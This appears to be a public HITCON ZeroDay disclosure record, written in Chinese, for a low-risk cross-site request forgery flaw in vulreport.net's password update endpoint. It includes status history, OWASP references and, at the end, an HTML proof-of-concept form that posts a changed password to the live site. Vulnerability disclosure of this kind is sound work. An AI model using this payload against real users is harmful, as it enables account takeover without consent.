Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00299
- 發信 Vendor: VulReport
- Title: VulReport 任意修改 CSRF
- Introduction: Cross-site request forgery
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2017/03/26 00:20:06 : 新提交 (由 aaa 更新此狀態)
- 2017/03/26 22:29:50 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/03/26 22:30:07 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/04/05 00:50:30 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/04/05 00:50:30 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/05/26 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-00299
- 通報者:honc (aaa)
- 風險:低
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
相關網址
https://vulreport.net/user/update
敘述
post request 『Referer』沒有 檢查是否來自哪個域發起的請求,也沒有設置相關token 、seesion 來產生獨立每個用戶的令牌驗證,導致CSRF
Poc:
<html>
<head>
<title>CSRF</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<form method="post" role="form" action="https://vulreport.net/user/update" class="ng-pristine ng-valid">
<input type="hidden" name="id" value="993">
<div id="input_pswd_rg" class="clear_fix">
<div class="input_form_titl">密碼</div>
<div class="input_form_divc_b">
<input type="password" name="password" class="input_form_text_b" value="">
</div>
</div>
<div id="input_pscf_rg" class="clear_fix">
<div class="input_form_titl fntsz_smal">驗證密碼</div>
<div class="input_form_divc_b">
<input type="password" name="password_check" class="input_form_text_b" value="">
</div>
</div>
<button type="submit">修改</button>
</form>
</center>
</body>
</html>